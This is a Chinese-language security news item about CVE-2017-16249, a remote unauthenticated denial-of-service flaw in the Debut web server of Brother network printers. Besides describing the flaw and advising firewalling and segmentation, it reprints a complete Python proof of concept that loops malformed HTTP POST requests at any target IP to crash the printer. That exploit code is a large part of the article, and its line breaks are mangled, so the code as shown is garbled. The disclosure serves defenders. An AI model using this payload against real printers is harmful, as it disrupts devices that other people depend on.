主页 > 卜八资讯 > 兄弟牌网络打印机被曝存在远程DoS漏洞

兄弟牌网络打印机被曝存在远程DoS漏洞

近期,Trustwave实验室发现兄弟牌(Brother)网络打印机的Debut嵌入式web服务前端存在漏洞,攻击者只需向目标打印机发送一个简单的HTTP POST畸形请求,就可对目标打印机形成远程DoS攻击。截至目前,全球有14000多台暴露在互联网的Brother打印机可能会受到该漏洞影响。

攻击过程中,打印机会向攻击者返回一个500错误代码响应,之后,Web服务端无法访问,打印机将无法正常运行,形成崩溃。不幸的是,尽管Trustwave方面已以多种方式与Brother公司就该漏洞进行通报,但到目前,Brother公司仍然没有释出任何更新补丁。

漏洞信息

漏洞类型:远程未授权DoS漏洞

漏洞公布时间: 2017.11.16

影响厂商: 兄弟公司-Brother (http://www.brother-usa.com)

影响产品: Debut嵌入式http服务(Debut embedded httpd)

影响产品版本:1.20及其以下版本

影响产品描述:兄弟牌网络打印机的Debut嵌入式http服务Web接口

CVE编号 : CVE-2017-16249

PoC

以下PoC通过连接目标打印机,发送畸形HTTP请求,等待打印机Web服务端返回500错误响应,之后,PoC又会继续向目标打印机发送畸形HTTP请求,继续让其发生500错误,如此反复,最终形成远程DoS攻击。

#!/usr/bin/pythonimport
 socketimport systarget = raw_input("[*] Enter target IP or hostname: 
")port = raw_input("[*] Enter target port: ")payload = "POST / HTTP/1.1
"payload += "Host: asdasdasd
"payload += "User-Agent: asdasdasd
"payload += "Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
"payload += "Accept-Language: en-US,en;q=0.5
"payload += "Referer: asdasdasdasd
"payload += "Connection: close
"payload += "Upgrade-Insecure-Requests: 1
"payload += "Content-Type: application/x-www-form-urlencoded
"payload += "Content-Length: 42
"payload += "asdasdasdasdasdasdasd

"print "[*] Starting DOS. Payload will be sent every time the server 
responds."while True: s = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) try: s.connect((target,int(port))) print "[*] 
Sending DOS payload" s.send(payload) # Wait for server to respond with 
500 error s.recv(4096) s.close() except: print("[!] Can't connect to 
target") sys.exit()

缓解措施

为了缓解该漏洞影响,管理员需要自行对相关设备进行加固防护。我们建议采取严格的访问控制列表和网络分段措施,配合防火墙之类设备,来限制Web端访问和设备暴露在网。

兄弟牌网络打印机被曝存在远程DoS漏洞(附PoC)

有些人根本不把DDoS攻击当回事,他们认为这就是简单的麻烦事。但DDoS攻击可以对组织机构的资源和生产力造成影响,是对组织机构直接网络攻击的一种方式,例如,攻击者可以发起DoS攻击,然后假冒解决问题的技术人员,直接对IT设备获取物理访问权限,深入接触到那些通过网络远程无法访问到的IT资源。漏洞虽小,但其影响不容忽视。